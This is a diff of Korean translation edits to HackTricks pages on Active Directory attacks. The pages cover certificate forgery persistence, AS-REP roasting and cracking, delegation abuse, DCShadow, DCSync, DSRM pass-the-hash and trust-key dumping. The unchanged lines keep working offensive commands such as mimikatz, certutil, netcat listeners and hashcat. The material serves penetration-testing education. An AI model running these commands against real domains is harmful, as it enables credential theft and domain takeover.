diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
index 1e73caad6..d0f60204e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -38,14 +38,14 @@ certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
 > [!WARNING]
 > 인증서 위조의 대상이 되는 사용자는 활성 상태여야 하며 Active Directory에서 인증할 수 있어야 프로세스가 성공합니다. krbtgt와 같은 특수 계정에 대한 인증서를 위조하는 것은 효과적이지 않습니다.
 
-이 위조된 인증서는 **유효** 기간이 지정된 종료일까지 **루트 CA 인증서가 유효한 한** (보통 5년에서 **10년 이상**) 유효합니다. 또한 **기계**에 대해서도 유효하므로 **S4U2Self**와 결합하면 공격자는 **CA 인증서가 유효한 한** 어떤 도메인 기계에서든 **지속성을 유지할 수 있습니다**.\
+이 위조된 인증서는 **유효**하며 지정된 종료 날짜까지와 **루트 CA 인증서가 유효한 한** (보통 5년에서 **10년 이상**) 유효합니다. 또한 **기계**에 대해서도 유효하므로 **S4U2Self**와 결합하면 공격자는 **CA 인증서가 유효한 한** 어떤 도메인 기계에서든 **지속성을 유지할 수 있습니다**.\
 게다가, 이 방법으로 **생성된 인증서**는 CA가 이를 인식하지 못하므로 **취소할 수 없습니다**.
 
 ## 악성 CA 인증서 신뢰 - DPERSIST2
 
 `NTAuthCertificates` 객체는 Active Directory (AD)가 사용하는 `cacertificate` 속성 내에 하나 이상의 **CA 인증서**를 포함하도록 정의됩니다. **도메인 컨트롤러**의 검증 프로세스는 인증하는 **인증서**의 발급자 필드에 지정된 **CA**와 일치하는 항목을 `NTAuthCertificates` 객체에서 확인하는 것을 포함합니다. 일치하는 항목이 발견되면 인증이 진행됩니다.
 
-공격자는 이 AD 객체에 대한 제어 권한이 있는 경우 `NTAuthCertificates` 객체에 자체 서명된 CA 인증서를 추가할 수 있습니다. 일반적으로 **Enterprise Admin** 그룹의 구성원과 **도메인 관리자** 또는 **포리스트 루트 도메인**의 **관리자**만 이 객체를 수정할 수 있는 권한이 부여됩니다. 그들은 `certutil.exe`를 사용하여 `NTAuthCertificates` 객체를 편집할 수 있으며, 명령어는 `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA126`입니다. 또는 [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool)을 사용할 수 있습니다.
+자기 서명된 CA 인증서는 공격자가 이 AD 객체를 제어할 수 있는 경우 `NTAuthCertificates` 객체에 추가할 수 있습니다. 일반적으로 **Enterprise Admin** 그룹의 구성원과 **도메인 관리자** 또는 **포리스트 루트 도메인**의 **관리자**만이 이 객체를 수정할 수 있는 권한을 부여받습니다. 그들은 `certutil.exe`를 사용하여 `NTAuthCertificates` 객체를 편집할 수 있으며, 명령어는 `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA126`입니다. 또는 [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool)을 사용할 수 있습니다.
 
 이 기능은 ForgeCert를 사용하여 동적으로 인증서를 생성하는 이전에 설명된 방법과 함께 사용할 때 특히 관련이 있습니다.
 
@@ -58,6 +58,6 @@ AD CS 구성 요소의 **보안 설명자 수정**을 통한 **지속성** 기
 - **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** 내의 모든 **하위 AD 객체 또는 컨테이너** (예: 인증서 템플릿 컨테이너, 인증 기관 컨테이너, NTAuthCertificates 객체 등)
 - 기본적으로 또는 조직에 의해 AD CS를 제어할 권한이 위임된 **AD 그룹** (예: 내장된 Cert Publishers 그룹 및 그 구성원)
 
-악의적인 구현의 예는 도메인에서 **상승된 권한**을 가진 공격자가 기본 **`User`** 인증서 템플릿에 **`WriteOwner`** 권한을 추가하는 것입니다. 공격자는 먼저 **`User`** 템플릿의 소유권을 자신으로 변경합니다. 그 후, **`mspki-certificate-name-flag`**를 **1**로 설정하여 **`ENROLLEE_SUPPLIES_SUBJECT`**를 활성화하여 사용자가 요청에 주체 대체 이름을 제공할 수 있도록 합니다. 이후 공격자는 **템플릿**을 사용하여 **도메인 관리자** 이름을 대체 이름으로 선택하고, 획득한 인증서를 DA로서 인증에 사용할 수 있습니다.
+악의적인 구현의 예는 도메인에서 **상승된 권한**을 가진 공격자가 기본 **`User`** 인증서 템플릿에 **`WriteOwner`** 권한을 추가하는 것입니다. 공격자는 먼저 **`User`** 템플릿의 소유권을 자신으로 변경합니다. 그 후, **`mspki-certificate-name-flag`**를 **1**로 설정하여 **`ENROLLEE_SUPPLIES_SUBJECT`**를 활성화하여 사용자가 요청에 주체 대체 이름을 제공할 수 있도록 합니다. 이후 공격자는 **템플릿**을 사용하여 **등록**하고, 대체 이름으로 **도메인 관리자** 이름을 선택하여 획득한 인증서를 DA로서 인증에 사용할 수 있습니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
index 9da5f5d83..a1e066fbd 100644
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-기본적으로 **Active Directory의 모든 사용자**는 도메인 또는 포리스트 DNS 존에서 **모든 DNS 레코드**를 **열거**할 수 있으며, 이는 존 전송과 유사합니다(사용자는 AD 환경에서 DNS 존의 자식 객체를 나열할 수 있습니다).
+기본적으로 **Active Directory**의 **모든 사용자**는 도메인 또는 포리스트 DNS 존에서 **모든 DNS 레코드**를 **열거**할 수 있으며, 이는 존 전송과 유사합니다(사용자는 AD 환경에서 DNS 존의 자식 객체를 나열할 수 있습니다).
 
 도구 [**adidnsdump**](https://github.com/dirkjanm/adidnsdump)는 내부 네트워크의 정찰 목적을 위해 존의 **모든 DNS 레코드**를 **열거**하고 **내보내기** 할 수 있게 해줍니다.
 ```bash
@@ -13,6 +13,6 @@ pip install .
 adidnsdump -u domain_name\\username ldap://10.10.10.10 -r
 cat records.csv
 ```
-자세한 내용은 [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)를 읽으세요.
+자세한 정보는 [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)를 읽으세요.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index 48024e9fc..eaec5fc99 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -1,9 +1,9 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 인터넷에는 **기본/약한** 로그인 자격 증명으로 LDAP가 구성된 프린터의 위험성을 **강조하는** 여러 블로그가 있습니다.\
-이는 공격자가 프린터를 **속여서 악성 LDAP 서버에 인증하도록** 할 수 있기 때문입니다(일반적으로 `nc -vv -l -p 444`면 충분합니다) 그리고 프린터의 **자격 증명을 평문으로** 캡처할 수 있습니다.
+이는 공격자가 프린터를 **속여서 악성 LDAP 서버에 인증하도록** 할 수 있기 때문입니다 (일반적으로 `nc -vv -l -p 444`면 충분합니다) 그리고 프린터의 **자격 증명을 평문으로** 캡처할 수 있습니다.
 
-또한 여러 프린터는 **사용자 이름이 포함된 로그**를 보유하거나 도메인 컨트롤러에서 **모든 사용자 이름을 다운로드**할 수 있습니다.
+또한, 여러 프린터는 **사용자 이름이 포함된 로그**를 가지고 있거나 도메인 컨트롤러에서 **모든 사용자 이름을 다운로드**할 수 있습니다.
 
 이 모든 **민감한 정보**와 일반적인 **보안 부족**은 프린터를 공격자에게 매우 흥미롭게 만듭니다.
 
@@ -28,11 +28,11 @@
 ```bash
 sudo nc -k -v -l -p 386
 ```
-그러나 이 방법의 성공은 다양합니다.
+그러나 이 방법의 성공률은 다릅니다.
 
 ### 방법 2: Slapd가 포함된 전체 LDAP 서버
 
-보다 신뢰할 수 있는 접근 방식은 전체 LDAP 서버를 설정하는 것입니다. 프린터는 자격 증명 바인딩을 시도하기 전에 널 바인드를 수행한 다음 쿼리를 실행합니다.
+더 신뢰할 수 있는 접근 방식은 전체 LDAP 서버를 설정하는 것입니다. 프린터는 자격 증명 바인딩을 시도하기 전에 널 바인드를 수행하고 쿼리를 실행합니다.
 
 1. **LDAP 서버 설정**: 가이드는 [이 출처](https://www.server-world.info/en/note?os=Fedora_26&p=openldap)에서 단계를 따릅니다.
 2. **주요 단계**:
@@ -45,7 +45,7 @@ sudo nc -k -v -l -p 386
 ```bash
 slapd -d 2
 ```
-## 참고문헌
+## 참고 문헌
 
 - [https://grimhacker.com/2018/03/09/just-a-printer/](https://grimhacker.com/2018/03/09/just-a-printer/)
 
diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md
index 7f1eacbc4..ea352edd5 100644
--- a/src/windows-hardening/active-directory-methodology/asreproast.md
+++ b/src/windows-hardening/active-directory-methodology/asreproast.md
@@ -33,16 +33,16 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
 Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 ```
 > [!WARNING]
-> AS-REP 로스팅을 Rubeus로 수행하면 0x17의 암호화 유형과 0의 사전 인증 유형을 가진 4768이 생성됩니다.
+> AS-REP 로스팅을 Rubeus로 수행하면 4768이 생성되며, 암호화 유형은 0x17이고 사전 인증 유형은 0입니다.
 
 ### 크래킹
 ```bash
 john --wordlist=passwords_kerb.txt hashes.asreproast
 hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 ```
-### Persistence
+### 지속성
 
-**GenericAll** 권한(또는 속성 쓰기 권한)이 있는 사용자에 대해 **preauth**가 필요하지 않도록 강제합니다:
+**GenericAll** 권한(또는 속성을 쓸 수 있는 권한)이 있는 사용자에 대해 **preauth**를 강제할 필요가 없습니다:
 ```bash:Using Windows
 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 ```
@@ -64,7 +64,7 @@ ASRepCatcher relay -dc $DC_IP --disable-spoofing
 # Passive listening of AS-REP packets, no packet alteration
 ASRepCatcher listen
 ```
-## 참조
+## 참고 문헌
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 
diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md
index b831947a4..6da0f6499 100644
--- a/src/windows-hardening/active-directory-methodology/bloodhound.md
+++ b/src/windows-hardening/active-directory-methodology/bloodhound.md
@@ -34,9 +34,9 @@ BloodHound는 그래프 이론을 사용하여 Active Directory 또는 Azure 환
 
 그래서, [Bloodhound ](https://github.com/BloodHoundAD/BloodHound)는 도메인을 자동으로 열거하고 모든 정보를 저장하며 가능한 권한 상승 경로를 찾고 모든 정보를 그래프를 사용하여 보여줄 수 있는 놀라운 도구입니다.
 
-BloodHound는 두 가지 주요 부분으로 구성됩니다: **ingestors**와 **visualisation application**.
+Bloodhound는 **ingestors**와 **visualisation application**의 2가지 주요 부분으로 구성됩니다.
 
-**ingestors**는 **도메인을 열거하고 모든 정보를 시각화 애플리케이션이 이해할 수 있는 형식으로 추출하는 데 사용됩니다**.
+**ingestors**는 **도메인을 열거하고 모든 정보를 시각화 애플리케이션이 이해할 수 있는 형식으로 추출하는 데 사용됩니다.**
 
 **visualisation application은 neo4j를 사용하여** 모든 정보가 어떻게 관련되어 있는지 보여주고 도메인에서 권한을 상승시키는 다양한 방법을 보여줍니다.
 
@@ -50,7 +50,7 @@ BloodHound CE가 생성된 후, 전체 프로젝트는 Docker 사용의 용이
 curl -L https://ghst.ly/getbhce | docker compose -f - up
 ```
 3. Docker Compose의 터미널 출력에서 무작위로 생성된 비밀번호를 찾습니다.  
-4. 브라우저에서 http://localhost:8080/ui/login으로 이동합니다. 사용자 이름으로 admin을 입력하고 로그에서 무작위로 생성된 비밀번호로 로그인합니다.  
+4. 브라우저에서 http://localhost:8080/ui/login으로 이동합니다. 사용자 이름으로 admin을 입력하고 로그에서 가져온 무작위로 생성된 비밀번호로 로그인합니다.  
 
 이후 무작위로 생성된 비밀번호를 변경해야 하며, 새로운 인터페이스가 준비되어 ingestors를 직접 다운로드할 수 있습니다.  
 
@@ -63,7 +63,7 @@ Invoke-BloodHound -CollectionMethod All
 ```
 > **CollectionMethod** 및 루프 세션에 대한 자세한 내용은 [여기](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained)에서 확인할 수 있습니다.
 
-다른 자격 증명을 사용하여 SharpHound를 실행하려면 CMD netonly 세션을 생성하고 그곳에서 SharpHound를 실행할 수 있습니다:
+다른 자격 증명을 사용하여 SharpHound를 실행하려면 CMD netonly 세션을 생성하고 거기에서 SharpHound를 실행할 수 있습니다:
 ```
 runas /netonly /user:domain\user "powershell.exe -exec bypass"
 ```
@@ -72,7 +72,7 @@ runas /netonly /user:domain\user "powershell.exe -exec bypass"
 ## Group3r
 
 [**Group3r**](https://github.com/Group3r/Group3r)는 **그룹 정책**과 관련된 Active Directory의 **취약점**을 찾기 위한 도구입니다. \
-도메인 내의 호스트에서 **모든 도메인 사용자**를 사용하여 **group3r를 실행**해야 합니다.
+**도메인 사용자**를 사용하여 도메인 내의 호스트에서 **group3r를 실행**해야 합니다.
 ```bash
 group3r.exe -f <filepath-name.log>
 # -s sends results to stdin
@@ -80,8 +80,8 @@ group3r.exe -f <filepath-name.log>
 ```
 ## PingCastle
 
-[**PingCastle**](https://www.pingcastle.com/documentation/) **AD 환경의 보안 태세를 평가**하고 멋진 **보고서**를 그래프와 함께 제공합니다.
+[**PingCastle**](https://www.pingcastle.com/documentation/) **는 AD 환경의 보안 태세를 평가**하고 멋진 **보고서**를 그래프와 함께 제공합니다.
 
-실행하려면 이진 파일 `PingCastle.exe`를 실행하면 **인터랙티브 세션**이 시작되어 옵션 메뉴를 표시합니다. 기본 옵션은 **`healthcheck`**로, **도메인**의 **개요**를 설정하고 **구성 오류** 및 **취약점**을 찾습니다.&#x20;
+실행하려면 이진 파일 `PingCastle.exe`를 실행하면 **옵션 메뉴**를 제공하는 **대화형 세션**이 시작됩니다. 기본 옵션은 **`healthcheck`**로, **도메인**의 **개요**를 설정하고 **구성 오류** 및 **취약점**을 찾습니다.&#x20;
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/constrained-delegation.md b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
index 982150a37..b91fceddd 100644
--- a/src/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -4,16 +4,16 @@
 
 ## Constrained Delegation
 
-이를 사용하여 도메인 관리자는 **컴퓨터가 사용자 또는 컴퓨터를** **서비스**에 대해 **가장할 수 있도록** 허용할 수 있습니다.
+이를 통해 도메인 관리자는 **컴퓨터가 사용자 또는 컴퓨터를** **서비스**에 대해 **가장할 수 있도록** **허용**할 수 있습니다.
 
 - **사용자를 위한 서비스(**_**S4U2self**_**):** 만약 **서비스 계정**이 [TRUSTED_TO_AUTH_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) (T2A4D)를 포함하는 _userAccountControl_ 값을 가지고 있다면, 다른 사용자를 대신하여 자신(서비스)에 대한 TGS를 얻을 수 있습니다.
-- **프록시를 위한 서비스(**_**S4U2proxy**_**):** **서비스 계정**은 **msDS-AllowedToDelegateTo**에 설정된 서비스에 대해 사용자를 대신하여 TGS를 얻을 수 있습니다. 이를 위해 먼저 해당 사용자로부터 자신에 대한 TGS가 필요하지만, S4U2self를 사용하여 그 TGS를 얻은 후 다른 TGS를 요청할 수 있습니다.
+- **프록시를 위한 서비스(**_**S4U2proxy**_**):** **서비스 계정**은 **msDS-AllowedToDelegateTo**에 설정된 서비스에 대해 사용자를 대신하여 TGS를 얻을 수 있습니다. 이를 위해 먼저 그 사용자로부터 자신에 대한 TGS가 필요하지만, S4U2self를 사용하여 그 TGS를 얻은 후 다른 TGS를 요청할 수 있습니다.
 
-**참고**: 사용자가 AD에서 ‘_계정이 민감하며 위임할 수 없습니다_’로 표시되면, 그들을 **가장할 수 없습니다**.
+**참고**: 사용자가 AD에서 ‘_계정이 민감하며 위임할 수 없음_’으로 표시되면, 그들을 **가장할 수 없습니다**.
 
-이는 **서비스의 해시를 손상시키면** 사용자를 **가장하고** 그들의 **대신 서비스에 대한 접근**을 얻을 수 있음을 의미합니다 (가능한 **privesc**).
+이는 **서비스의 해시를 손상시키면** 사용자를 **가장하고** 그들의 **대신 서비스에 대한 접근**을 **얻을 수 있다는** 것을 의미합니다 (가능한 **privesc**).
 
-게다가, 사용자가 가장할 수 있는 서비스에만 접근할 수 있는 것이 아니라 **모든 서비스에 접근할 수 있습니다**. 왜냐하면 SPN(요청된 서비스 이름)이 확인되지 않고, 오직 권한만 확인되기 때문입니다. 따라서 **CIFS 서비스**에 접근할 수 있다면 `/altservice` 플래그를 사용하여 **HOST 서비스**에도 접근할 수 있습니다.
+게다가, 사용자가 가장할 수 있는 서비스에만 접근할 수 있는 것이 아니라 **모든 서비스에 접근할 수 있습니다**. 왜냐하면 SPN(요청된 서비스 이름)이 확인되지 않고, 오직 권한만 확인되기 때문입니다. 따라서 **CIFS 서비스**에 접근할 수 있다면, Rubeus에서 `/altservice` 플래그를 사용하여 **HOST 서비스**에도 접근할 수 있습니다.
 
 또한, **DC에서의 LDAP 서비스 접근**은 **DCSync**를 악용하는 데 필요합니다.
 ```bash:Enumerate
diff --git a/src/windows-hardening/active-directory-methodology/custom-ssp.md b/src/windows-hardening/active-directory-methodology/custom-ssp.md
index 9b564d290..f78ef85ec 100644
--- a/src/windows-hardening/active-directory-methodology/custom-ssp.md
+++ b/src/windows-hardening/active-directory-methodology/custom-ssp.md
@@ -10,7 +10,7 @@
 #### Mimilib
 
 Mimikatz에서 제공하는 `mimilib.dll` 바이너리를 사용할 수 있습니다. **이것은 모든 자격 증명을 명확한 텍스트로 파일에 기록합니다.**\
-dll을 `C:\Windows\System32\`에 배치하세요.\
+dll을 `C:\Windows\System32\`에 드롭하세요.\
 기존 LSA 보안 패키지 목록을 가져옵니다:
 ```bash:attacker@target
 PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
@@ -31,7 +31,7 @@ Mimikatz를 사용하여 메모리에 직접 주입할 수도 있습니다(약
 privilege::debug
 misc::memssp
 ```
-이것은 재부팅 후에도 유지되지 않습니다.
+이것은 재부팅을 견디지 못합니다.
 
 #### 완화
 
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index b1321cd15..9b2b1c0d1 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -61,9 +61,9 @@ lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attr
 - 대상 사용자 객체에서: `(A;;WP;;;UserSID)`
 - 구성 컨테이너의 사이트 객체에서: `(A;CI;CCDC;;;UserSID)`
 
-객체의 현재 ACE를 가져오려면: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
+객체의 현재 ACE를 가져오려면: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl`
 
-이 경우 **여러 변경을** 해야 하며, 하나만이 아닙니다. 따라서 **mimikatz1 세션** (RPC 서버)에서 변경하려는 각 변경에 대해 **`/stack`** 매개변수를 사용하세요. 이렇게 하면 **`/push`**를 한 번만 수행하여 모든 스택된 변경을 악성 서버에서 수행할 수 있습니다.
+이 경우 **여러 변경을** 해야 하므로, **mimikatz1 세션** (RPC 서버)에서 변경하려는 각 변경에 대해 **`/stack`** 매개변수를 사용해야 합니다. 이렇게 하면, 모든 스택된 변경을 수행하기 위해 **`/push`**를 한 번만 사용하면 됩니다.
 
 [**DCShadow에 대한 더 많은 정보는 ired.team에서 확인하세요.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
 
diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md
index 73c6f023d..fc3532b69 100644
--- a/src/windows-hardening/active-directory-methodology/dcsync.md
+++ b/src/windows-hardening/active-directory-methodology/dcsync.md
@@ -8,7 +8,7 @@
 
 **DCSync에 대한 중요 사항:**
 
-- **DCSync 공격은 도메인 컨트롤러의 동작을 시뮬레이션하고 다른 도메인 컨트롤러에 정보를 복제하도록 요청합니다**. 이는 디렉터리 복제 서비스 원격 프로토콜(MS-DRSR)을 사용합니다. MS-DRSR은 Active Directory의 유효하고 필요한 기능이기 때문에 끄거나 비활성화할 수 없습니다.
+- **DCSync 공격은 도메인 컨트롤러의 동작을 시뮬레이션하고 다른 도메인 컨트롤러에 정보를 복제하도록 요청합니다**. 이는 디렉터리 복제 서비스 원격 프로토콜(MS-DRSR)을 사용합니다. MS-DRSR은 Active Directory의 유효하고 필요한 기능이므로 끄거나 비활성화할 수 없습니다.
 - 기본적으로 **도메인 관리자, 엔터프라이즈 관리자, 관리자 및 도메인 컨트롤러** 그룹만이 필요한 권한을 가지고 있습니다.
 - reversible encryption으로 저장된 계정 비밀번호가 있는 경우, Mimikatz에서 비밀번호를 평문으로 반환하는 옵션이 제공됩니다.
 
diff --git a/src/windows-hardening/active-directory-methodology/diamond-ticket.md b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
index c45fc9da1..dd6cf9a32 100644
--- a/src/windows-hardening/active-directory-methodology/diamond-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
@@ -4,7 +4,7 @@
 
 ## Diamond Ticket
 
-**황금 티켓처럼**, 다이아몬드 티켓은 **모든 사용자로서 모든 서비스에 접근할 수 있는 TGT**입니다. 황금 티켓은 완전히 오프라인에서 위조되며, 해당 도메인의 krbtgt 해시로 암호화된 후 로그온 세션에 전달되어 사용됩니다. 도메인 컨트롤러는 TGT를 추적하지 않기 때문에(또는 그들이 정당하게 발급한 TGT를 추적하지 않기 때문에) 자신의 krbtgt 해시로 암호화된 TGT를 기꺼이 수용합니다.
+**황금 티켓처럼**, 다이아몬드 티켓은 **모든 사용자로서 모든 서비스에 접근할 수 있는 TGT**입니다. 황금 티켓은 완전히 오프라인에서 위조되며, 해당 도메인의 krbtgt 해시로 암호화된 후 로그온 세션에 전달되어 사용됩니다. 도메인 컨트롤러는 TGT를 추적하지 않기 때문에(또는 그들이 정당하게 발급한) 자신의 krbtgt 해시로 암호화된 TGT를 기꺼이 수용합니다.
 
 황금 티켓 사용을 감지하는 두 가지 일반적인 기술이 있습니다:
 
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index 1204b9e6c..2541c646d 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -7,13 +7,13 @@
 ```bash
 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
 ```
-그런 다음 해당 계정이 작동하는지 확인해야 하며, 레지스트리 키의 값이 "0"이거나 존재하지 않는 경우 **"2"로 설정해야 합니다**:
+그런 다음 해당 계정이 작동하는지 확인해야 하며, 레지스트리 키의 값이 "0"이거나 존재하지 않으면 **"2"로 설정해야 합니다**:
 ```bash
 Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
 New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
 Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"
 ```
-그런 다음, PTH를 사용하여 **C$의 내용을 나열하거나 심지어 셸을 얻을 수 있습니다**. 메모리에 있는 해당 해시로 새로운 PowerShell 세션을 생성할 때 (PTH의 경우) **사용되는 "도메인"은 DC 머신의 이름일 뿐입니다:**
+그런 다음, PTH를 사용하여 **C$의 내용을 나열하거나 심지어 셸을 얻을 수 있습니다**. 메모리에 있는 해당 해시로 새 PowerShell 세션을 생성할 때 (PTH의 경우) **사용되는 "도메인"은 DC 머신의 이름일 뿐입니다:**
 ```bash
 sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
 #And in new spawned powershell you now can access via NTLM the content of C$
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 9c78ca014..1291e9c34 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -30,9 +30,9 @@ MemberDistinguishedName : CN=S-1-5-21-1028541967-2937615241-1935644758-1115,CN=F
 ```
 ## Trust Account Attack
 
-두 도메인 간에 신뢰 관계가 설정될 때 보안 취약점이 존재합니다. 여기서 도메인 **A**와 도메인 **B**로 식별되며, 도메인 **B**가 도메인 **A**에 신뢰를 확장합니다. 이 설정에서는 도메인 **B**를 위해 도메인 **A**에 특별한 계정이 생성되며, 이는 두 도메인 간의 인증 과정에서 중요한 역할을 합니다. 도메인 **B**와 연결된 이 계정은 도메인 간 서비스에 접근하기 위한 티켓을 암호화하는 데 사용됩니다.
+신뢰 관계가 두 도메인 간에 설정될 때 보안 취약점이 존재합니다. 여기서 도메인 **A**와 도메인 **B**로 식별되며, 도메인 **B**가 도메인 **A**에 대한 신뢰를 확장합니다. 이 설정에서는 도메인 **B**를 위해 도메인 **A**에 특별한 계정이 생성되며, 이는 두 도메인 간의 인증 프로세스에서 중요한 역할을 합니다. 도메인 **B**와 연결된 이 계정은 도메인 간 서비스에 접근하기 위한 티켓을 암호화하는 데 사용됩니다.
 
-여기서 이해해야 할 중요한 점은 이 특별한 계정의 비밀번호와 해시가 도메인 **A**의 도메인 컨트롤러에서 명령줄 도구를 사용하여 추출될 수 있다는 것입니다. 이 작업을 수행하는 명령은:
+여기서 이해해야 할 중요한 점은 이 특별한 계정의 비밀번호와 해시를 도메인 **A**의 도메인 컨트롤러에서 명령줄 도구를 사용하여 추출할 수 있다는 것입니다. 이 작업을 수행하는 명령은:
 ```powershell
 Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
 ```
@@ -54,7 +54,7 @@ lsadump::trust /patch
 ```
 ### 명확한 신뢰 비밀번호 수집
 
-이전 흐름에서는 **명확한 텍스트 비밀번호** 대신 신뢰 해시가 사용되었습니다 (이것은 또한 **mimikatz에 의해 덤프되었습니다**).
+이전 흐름에서는 **명확한 텍스트 비밀번호** 대신 신뢰 해시가 사용되었습니다 (이것은 또한 **mimikatz에 의해 덤프됨**).
 
 명확한 비밀번호는 mimikatz의 \[ CLEAR ] 출력을 16진수로 변환하고 널 바이트 ‘\x00’을 제거하여 얻을 수 있습니다:
 
@@ -62,7 +62,7 @@ lsadump::trust /patch
 
 신뢰 관계를 생성할 때 사용자가 신뢰를 위해 비밀번호를 입력해야 하는 경우가 있습니다. 이 시연에서 키는 원래의 신뢰 비밀번호이며 따라서 사람이 읽을 수 있습니다. 키가 주기적으로 변경되면 (30일), 명확한 텍스트는 사람이 읽을 수 없지만 기술적으로 여전히 사용 가능합니다.
 
-명확한 비밀번호는 신뢰 계정으로 정기적인 인증을 수행하는 데 사용될 수 있으며, 신뢰 계정의 Kerberos 비밀 키를 사용하여 TGT를 요청하는 대안입니다. 여기서 ext.local에서 Domain Admins의 구성원을 위해 root.local을 쿼리합니다:
+명확한 비밀번호는 신뢰 계정으로 정기적인 인증을 수행하는 데 사용될 수 있으며, 신뢰 계정의 Kerberos 비밀 키를 사용하여 TGT를 요청하는 대안입니다. 여기서 ext.local에서 Domain Admins의 구성원을 쿼리합니다:
 
 ![](<../../images/image (792).png>)
 
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
index 170f6df2a..20e7d1c4d 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
